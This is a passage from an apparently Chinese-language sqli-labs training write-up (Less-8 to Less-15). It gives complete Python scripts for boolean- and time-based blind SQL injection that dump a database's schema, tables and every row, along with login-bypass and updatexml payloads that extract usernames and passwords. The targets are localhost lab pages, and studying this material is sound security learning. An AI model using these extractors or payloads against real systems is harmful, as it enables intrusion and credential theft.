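            if 'Your Login name' in get(probe % (pos, code)).text:
                recovered += chr(code)
                print '  [-]', recovered
                break
    print '  [-]DBName is:', recovered
    return recovered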

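def GuessTBsNum(name):
    """Count tables in schema `name` on Less-8 (URL fixed from Less-1).
    N = 0, 1, ... until the truth marker appears. Returns N."""
    print '[+]Guessing Tables num'
    probe = "http://localhost/sqllab/Less-8/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, name)).text:
        count += 1
    print '  [-]The Tables num is', count
    return count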

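def GuessTBNameLenth(n, name):
    """Length of the n-th table name in schema `name` on Less-8 (URL fixed
    from Less-1); first falsy ascii(SUBSTR(...)) position minus one."""
    print '[+]Guessing TableName Length'
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (name, n, pos)).text:
        pos += 1
    print '  [-]The TableName Lenth is', pos - 1
    return pos - 1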

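def GuessTBsNames(num, DBName):
    """Recover the first `num` table names of schema DBName on Less-8 (URL
    fixed from Less-1). Returns the list of names."""
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+"
    recovered = []
    for index in range(num):
        width = GuessTBNameLenth(index, DBName)
        print '  [-]Guessing Table Name'
        current = ''
        for pos in xrange(1, width + 1):
            for code in xrange(127):
                if 'Your Login name' in get(probe % (DBName, index, pos, code)).text:
                    current += chr(code)
                    print '    [-]', current
                    break
        recovered.append(current)
    print '  [-]All Tables Names is:', recovered
    return recovered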

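def GuessCLMNum(tname, dname):
    """Count the columns of dname.tname on Less-8 (URL fixed from Less-1).
    Returns the first N for which the count comparison is true."""
    print '[+]Guessing Colunms num'
    probe = "http://localhost/sqllab/Less-8/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, tname, dname)).text:
        count += 1
    print '  [-]The Colunm num is', count
    return count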

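def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name of dname.tname on Less-8 (URL
    fixed from Less-1)."""
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (tname, dname, cnum, pos)).text:
        pos += 1
    print '  [-]The Colunm Lenth is', pos - 1
    return pos - 1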

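def GuessCLMName(DBName, TNames):
    """Enumerate the columns of each table in TNames on Less-8 and dump each
    column as soon as its name is known.

    Fixes: the URL pointed at Less-1 (copy-paste leftover) and the value
    returned by GuessDatas was discarded. Prints and request order are
    unchanged; the function now returns {table: [(column, rows), ...]}.
    """
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+"
    result = {}
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        dumps = []
        for cnum in range(GuessCLMNum(tname, DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for pos in xrange(1, length + 1):
                for code in xrange(127):
                    if 'Your Login name' in get(probe % (tname, DBName, cnum, pos, code)).text:
                        name += chr(code)
                        print '    [-]', name
                        break
            dumps.append((name, GuessDatas(DBName, tname, name)))
            CLMNames.append(name)
        print '  [-]The Colunms are', CLMNames
        result[tname] = dumps
    return result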


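def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname over column cname on Less-8 (URL fixed from
    Less-1). Returns the first N that is true."""
    probe = "http://localhost/sqllab/Less-8/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+"
    count = 0
    while 'Your Login name' not in get(probe % (count, cname, dname, tname)).text:
        count += 1
    print '  [-]The Datas num is', count
    return count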

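def GuessDataLen(dname, tname, cname, n):
    """Length of row n's value in dname.tname.cname on Less-8 (URL fixed
    from Less-1)."""
    print '    [-]Guessing data length'
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+"
    pos = 1
    while 'Your Login name' in get(probe % (cname, dname, tname, n, pos)).text:
        pos += 1
    print '  [-]The Data Lenth is', pos - 1
    return pos - 1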

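def GuessDatas(dname, tname, cname):
    """Dump every row of dname.tname.cname by boolean-blind probing on Less-8.

    Fixes: the URL pointed at Less-1; the retry loop used a bare
    ``except:`` (also catching KeyboardInterrupt) and retried with no pause.
    It now targets Less-8, catches Exception only and sleeps one second
    between attempts. Returns a list of strings, one per row.
    """
    import time  # local import keeps the listing's top-of-file imports as-is
    datanum = GuessDatasnum(dname, tname, cname)
    probe = "http://localhost/sqllab/Less-8/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+"
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for pos in xrange(1, length + 1):
            for code in xrange(127):
                while True:
                    try:
                        r = get(probe % (cname, dname, tname, no, pos, code))
                        break
                    except Exception:
                        print 'Relaxing...'
                        time.sleep(1)
                if 'Your Login name' in r.text:
                    name += chr(code)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data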


# Driver for Less-8: schema -> tables -> columns (data dumped inside GuessCLMName).
DBLength = GuessDBLength()  # length of database()
DBName = GuessDBName(DBLength)  # its characters
print
TBsNum = GuessTBsNum(DBName)  # number of tables in that schema
TBsNames = GuessTBsNames(TBsNum, DBName)  # their names
print
GuessCLMName(DBName, TBsNames)  # columns of every table, plus their data
print '[!]All Done!'

Day9-Less9

分析

' or 1 union select 1,2,sleep(2) --+

0' or length(database())=8 --+
1' and length(database())=8 and sleep(2)--+

代码

from requests import get
from time import *

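def GuessDBLength():
    """Time-based blind probe for the length of database() on Less-9.

    The page shows no difference between true and false, so each probe ends
    in ``and sleep(2)`` and a response slower than 1.5 s is read as true.

    Fix: requests were timed with ``clock()``, which on Unix Python 2 is CPU
    time and never sees the server-side sleep (the loop would run forever).
    Wall-clock ``time()``, also exported by ``from time import *``, is used.
    """
    print '[+]Guessing DBLength'
    probe = "http://localhost/sqllab/Less-9/?id=1' and length(database())=%d  and sleep(2)--+"
    guess = 0
    while True:
        started = time()
        get(probe % guess)
        if time() - started > 1.5:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1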

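def GuessDBName(length):
    """Recover database() character by character on Less-9 using the
    sleep(2) timing oracle (>1.5 s elapsed means the guess is right).

    Fix: ``clock()`` replaced by wall-clock ``time()`` so the delay is
    measured on every platform. Returns the recovered name.
    """
    print '[+]Guessing DBName'
    probe = "http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+"
    recovered = ''
    for pos in xrange(1, length + 1):
        for code in xrange(127):
            started = time()
            get(probe % (pos, code))
            if time() - started > 1.5:
                recovered += chr(code)
                print '  [-]', recovered
                break
    print '  [-]DBName is:', recovered
    return recovered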

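def GuessTBsNum(name):
    """Count tables in schema `name` on Less-9 with the sleep(2) oracle.

    Fix: ``clock()`` replaced by wall-clock ``time()``. Returns the first N
    whose probe takes longer than 1.5 s.
    """
    print '[+]Guessing Tables num'
    probe = "http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+"
    count = 0
    while True:
        started = time()
        get(probe % (count, name))
        if time() - started > 1.5:
            print '  [-]The Tables num is', count
            return count
        count += 1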

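def GuessTBNameLenth(n, name):
    """Length of the n-th table name in schema `name` on Less-9.

    While ascii(SUBSTR(..., i, 1)) is truthy the sleep fires; the first fast
    response marks one past the end. Fix: ``clock()`` -> ``time()``.
    """
    print '[+]Guessing TableName Length'
    probe = "http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+"
    pos = 1
    while True:
        started = time()
        get(probe % (name, n, pos))
        if time() - started < 1.5:
            print '  [-]The TableName Lenth is', pos - 1
            return pos - 1
        pos += 1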

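def GuessTBsNames(num, DBName):
    """Recover all ``num`` table names of schema ``DBName`` (time-based).

    Each name's length comes from GuessTBNameLenth; each character is then
    found by trying ASCII 0..126 and waiting for the sleep(2) delay. A
    position with no hit is skipped. Returns the names in LIMIT-offset order.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames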

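def GuessCLMNum(tname,dname):
    """Count the columns of dname.tname via INFORMATION_SCHEMA (time-based).

    Tries i = 0, 1, ...; the first probe delayed by sleep(2) is the count.
    Both names go into quoted SQL literals unescaped.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))
        if time()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1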

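def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name (0-based LIMIT offset) of dname.tname.

    Same scan as GuessTBNameLenth: the first position whose ``ascii(SUBSTR())``
    probe is not delayed lies one past the end, so i-1 is returned.
    """
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))
        if time()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1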

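def GuessCLMName(DBName, TNames):
    """For each table in TNames, recover its column names character by
    character (time-based) and dump every column's rows via GuessDatas.

    DBName: schema name; TNames: list from GuessTBsNames. Prints its findings
    and returns nothing. A column position with no hit in ASCII 0..126 is
    skipped, so a non-ASCII name comes back short.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                    get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    if time()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break
            # dump the column's rows right away; GuessDatas prints them itself,
            # so its return value is not needed here
            GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames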


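def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname as seen through ``count(cname)`` (time-based).

    Returns the first i whose probe is delayed. Note count(col) skips NULLs
    while GuessDatas walks rows by LIMIT offset, so a NULL cell makes the two
    disagree. The identifiers are spliced into the query unquoted.
    """
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))
        if time()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1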

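def GuessDataLen(dname, tname, cname, n):
    """Length of the value in row n (0-based LIMIT offset) of column cname.

    Scans positions 1, 2, ... until ``ascii(SUBSTR())`` stops delaying the
    response; returns that position minus 1.
    """
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))
        if time()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1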

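def GuessDatas(dname, tname, cname):
    """Dump every value of column cname in dname.tname, one character per
    probe, using the sleep(2) delay as the true/false signal.

    Returns the list of recovered values (strings), in LIMIT-offset order.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    # wall clock (clock() is CPU time on Unix); taken inside the
                    # retry loop so a failed attempt does not inflate the timing
                    s = time()
                    try:
                        get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except Exception:
                        # retry only real errors: the original bare except also
                        # swallowed KeyboardInterrupt, so Ctrl-C could not stop
                        # this loop; pause instead of hammering a dead server
                        print 'Relaxing...'
                        sleep(1)
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data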


# Driver: schema -> tables -> columns -> rows, all through the time-based
# channel above. Module-level, so it also runs on import.
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)  # also dumps every column's rows via GuessDatas
print '[!]All Done!'

Day10-Less10

分析

同 9
只是单引号改双引号

代码

from requests import get
from time import *

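def GuessDBLength():
    """Time-based blind probe for length(database()) on Less-10 (double-quote
    context; the payload is the Less-9 one with ``"`` instead of ``'``).

    Tries i = 0, 1, 2, ...; a response slower than 1.5 s means the injected
    ``and sleep(2)`` ran, i.e. the length matched. Returns i.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        # wall clock: time.clock() is CPU time on Unix (and removed in 3.8), so
        # the 2 s the server spends in sleep() would never show up in it
        s = time()
        get("http://localhost/sqllab/Less-10/?id=1\" and length(database())=%d  and sleep(2)--+" %i)
        if time()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1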

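def GuessDBName(length):
    """Recover the database name one character at a time (time-based).

    For positions 1..length, tries ASCII 0..126 and keeps the first code whose
    request is delayed. A position with no hit is skipped silently.
    Returns the name.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
            get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            if time()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name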

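def GuessTBsNum(name):
    """Count the tables of schema ``name`` (time-based).

    Tries i = 0, 1, ... against ``i=(SELECT count(TABLE_NAME) ...)``; the
    first delayed probe is the count. ``name`` is spliced in unescaped.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+" %(i,name))
        if time()-s > 1.5:
            print '  [-]The Tables num is', i
            return i
        i+=1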

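def GuessTBNameLenth(n, name):
    """Length of the n-th table name (0-based LIMIT offset) in schema ``name``.

    ``ascii(SUBSTR(..., i, 1))`` is truthy while a character exists; the first
    position that is NOT delayed lies one past the end, so i-1 is returned.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+" %(name,n,i))
        if time()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1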

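def GuessTBsNames(num, DBName):
    """Recover all ``num`` table names of schema ``DBName`` (time-based).

    Length from GuessTBNameLenth, then each character by scanning ASCII
    0..126 for the delayed probe. Returns the names in LIMIT-offset order.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames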

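def GuessCLMNum(tname,dname):
    """Count the columns of dname.tname via INFORMATION_SCHEMA (time-based).

    Tries i = 0, 1, ...; the first delayed probe is the count.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))
        if time()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1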

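def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name (0-based LIMIT offset) of dname.tname.

    First position whose ``ascii(SUBSTR())`` probe is not delayed is one past
    the end; returns i-1.
    """
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))
        if time()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1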

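def GuessCLMName(DBName, TNames):
    """For each table in TNames, recover its column names (time-based) and
    dump every column's rows via GuessDatas. Prints only; returns nothing.

    A column position with no hit in ASCII 0..126 is skipped.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                    get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    if time()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break
            # GuessDatas prints the rows itself; its return value is unused here
            GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames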


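def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname through ``count(cname)`` (time-based).

    count(col) skips NULLs while GuessDatas walks rows by LIMIT offset, so a
    NULL cell makes the two disagree. Returns the first delayed i.
    """
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))
        if time()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1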

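def GuessDataLen(dname, tname, cname, n):
    """Length of the value in row n (0-based LIMIT offset) of column cname.

    Scans positions until ``ascii(SUBSTR())`` stops delaying; returns i-1.
    """
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))
        if time()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1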

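def GuessDatas(dname, tname, cname):
    """Dump every value of column cname in dname.tname, one character per
    probe, using the sleep(2) delay as the signal. Returns the values.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    # wall clock (clock() is CPU time on Unix); taken inside the
                    # retry loop so a failed attempt does not inflate the timing
                    s = time()
                    try:
                        get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except Exception:
                        # retry only real errors: the original bare except also
                        # swallowed KeyboardInterrupt, so Ctrl-C could not stop
                        # this loop; pause instead of hammering a dead server
                        print 'Relaxing...'
                        sleep(1)
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data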

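# Driver: schema -> tables -> columns -> rows. The timer uses time() rather
# than clock(): on Unix clock() is CPU time, so a run that is almost entirely
# socket waiting would report ~0 s (and clock() is gone in Python 3.8+).
s = time()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)  # also dumps every column's rows via GuessDatas
print '[!]All Done!'
print '[!]Timer', round(time()-s,2),'s'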

Day11-Less11

分析

select XX,XX,XX from XX where username = '$uname' and password = '$passwd'
1' group by 3#
报错,说明列数不足 3;结合下一行,实际是 2 列

select XX,XX from XX where username = '$uname' and password = '$passwd'

Username:' or 1 limit 1,2#
Password:(任意)

Day12-Less12

分析

select XX,XX,XX from XX where username = ("$uname") and password = ("$passwd")
1") group by 3#
报错,说明列数不足 3;结合下一行,实际是 2 列

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

Username:") or 1 limit 1,2#
Password:(任意)

Day13-Less13

分析

select XX,XX from XX where username = ('$uname') and password = ('$passwd')


') union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) #

Day14-Less14

分析

select XX,XX from XX where username = "$uname" and password = "$passwd"

" union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) #

Day15-Less15

分析

select XX,XX from XX where username = '$uname' and password = '$passwd'
1' or 1 #

代码

from requests import post

def GuessDBLength():
    """Boolean-based blind probe for length(database()) on Less-15.

    The login page shows ``flag.jpg`` only when the injected condition is
    true, so that marker decides each probe. Tries 0, 1, 2, ... and returns
    the first length that matches (never returns if none does).
    """
    print '[+]Guessing DBLength'
    guess = 0
    while True:
        cond = "0' or length(database())=%d#" % guess
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' in page:
            print '  [-]The DatabaseNameLength is', guess
            return guess
        guess += 1

def GuessDBName(length):
    """Recover the database name character by character (boolean-based).

    For each position 1..length, try ASCII 0..126 until the page shows
    ``flag.jpg``. A position with no hit is skipped, so a non-ASCII name
    comes back shorter than ``length``. Returns the name.
    """
    print '[+]Guessing DBName'
    found = ''
    for pos in range(1, length + 1):
        for code in range(127):
            cond = "0' or ascii(SUBSTR(database(),%d,1))='%d'#" % (pos, code)
            page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
            if 'flag.jpg' in page:
                found += chr(code)
                print '  [-]', found
                break
    print '  [-]DBName is:', found
    return found

def GuessTBsNum(name):
    """Count the tables of schema ``name`` (boolean-based).

    Probes ``i=(SELECT count(TABLE_NAME) ...)`` for i = 0, 1, ...; the first
    page showing ``flag.jpg`` gives the count. ``name`` goes into a quoted SQL
    literal unescaped.
    """
    print '[+]Guessing Tables num'
    count = 0
    while True:
        cond = "' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" % (count, name)
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' in page:
            print '  [-]The Tables num is', count
            return count
        count += 1

def GuessTBNameLenth(n, name):
    """Length of the n-th table name (0-based LIMIT offset) in schema ``name``.

    Position i is probed with ``ascii(SUBSTR(..., i, 1))``, truthy while a
    character exists; the first position without ``flag.jpg`` is one past
    the end, so i-1 is returned.
    """
    print '[+]Guessing TableName Length'
    pos = 1
    while True:
        cond = "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" % (name, n, pos)
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' not in page:
            print '  [-]The TableName Lenth is', pos - 1
            return pos - 1
        pos += 1

def GuessTBsNames(num, DBName):
    """Recover all ``num`` table names of ``DBName`` (boolean-based).

    Returns the names in LIMIT-offset order; a character position with no
    hit in ASCII 0..126 is skipped.
    """
    names = []
    for offset in range(num):
        length = GuessTBNameLenth(offset, DBName)
        print '  [-]Guessing Table Name'
        current = ''
        for pos in range(1, length + 1):
            for code in range(127):
                cond = "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" % (DBName, offset, pos, code)
                page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
                if 'flag.jpg' in page:
                    current += chr(code)
                    print '    [-]', current
                    break
        names.append(current)
    print '  [-]All Tables Names is:', names
    return names

def GuessCLMNum(tname,dname):
    """Count the columns of dname.tname via INFORMATION_SCHEMA (boolean-based).

    Tries i = 0, 1, ...; the first page showing ``flag.jpg`` is the count.
    """
    print '[+]Guessing Colunms num'
    count = 0
    while True:
        cond = "' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" % (count, tname, dname)
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' in page:
            print '  [-]The Colunm num is', count
            return count
        count += 1

def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name (0-based LIMIT offset) of dname.tname.

    First position whose ``ascii(SUBSTR())`` probe does not show ``flag.jpg``
    is one past the end; returns pos-1.
    """
    pos = 1
    while True:
        cond = "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" % (tname, dname, cnum, pos)
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' not in page:
            print '  [-]The Colunm Lenth is', pos - 1
            return pos - 1
        pos += 1

def GuessCLMName(DBName, TNames):
    """For each table in TNames, recover its column names and dump each
    column's rows through GuessDatas (boolean-based). Prints only.

    A column position with no hit in ASCII 0..126 is skipped.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        columns = []
        for cnum in range(GuessCLMNum(tname, DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            current = ''
            for pos in range(1, length + 1):
                for code in range(127):
                    cond = "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" % (tname, DBName, cnum, pos, code)
                    page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
                    if 'flag.jpg' in page:
                        current += chr(code)
                        print '    [-]', current
                        break
            GuessDatas(DBName, tname, current)  # prints the column's rows itself
            columns.append(current)
        print '  [-]The Colunms are', columns


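def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname through ``count(cname)`` (boolean-based).

    Posts to the same Less-15/ URL as every sibling (the original appended a
    stray ``?id=``, which the POST-only page never reads). count(col) skips
    NULLs while GuessDatas walks rows by LIMIT offset, so a NULL cell makes
    the two disagree. Returns the first i whose page shows ``flag.jpg``.
    """
    i = 0
    while 1:
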